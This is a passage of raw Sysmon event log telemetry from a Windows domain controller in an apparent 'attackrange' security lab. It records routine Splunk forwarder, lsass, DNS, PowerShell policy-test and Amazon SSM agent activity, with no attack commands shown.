Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.407{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 11241100x80000000000000002429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.330{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_tjjeaadm.5ar.ps12021-03-31 12:01:04.330 10341000x80000000000000002428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.301{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.405{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49686-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000002426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.405{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49686-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000002425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.811{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54221- 354300x80000000000000002424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.485{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65022- 354300x80000000000000002423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.484{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65022-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domain 10341000x80000000000000002422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.221{266CAFBE-647F-6064-5300-00000000AE01}37763780C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.049{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.049{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 
12:01:05.971{266CAFBE-6481-6064-6100-00000000AE01}3848\PSHost.132616656659114611.3848.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.971{266CAFBE-6481-6064-6100-00000000AE01}3848NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_md3fywrk.z33.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.971{266CAFBE-6481-6064-6100-00000000AE01}3848NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_vydednzy.bax.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.955{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_vydednzy.bax.ps12021-03-31 12:01:05.955 10341000x80000000000000002655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.945{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.914{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.913{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.911{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.911{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.911{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Amazon\PVDriver'" "| Select-Object" "Name, Version" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.871{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.871{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000002638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
